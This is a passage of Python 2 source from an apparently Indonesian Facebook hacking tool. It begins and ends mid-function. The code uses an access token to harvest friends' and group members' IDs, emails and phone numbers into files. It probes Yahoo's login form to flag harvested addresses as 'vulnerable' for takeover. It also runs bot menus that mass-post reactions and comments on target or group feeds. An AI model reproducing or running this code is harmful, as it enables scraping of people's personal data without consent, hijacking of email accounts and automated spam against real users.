login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
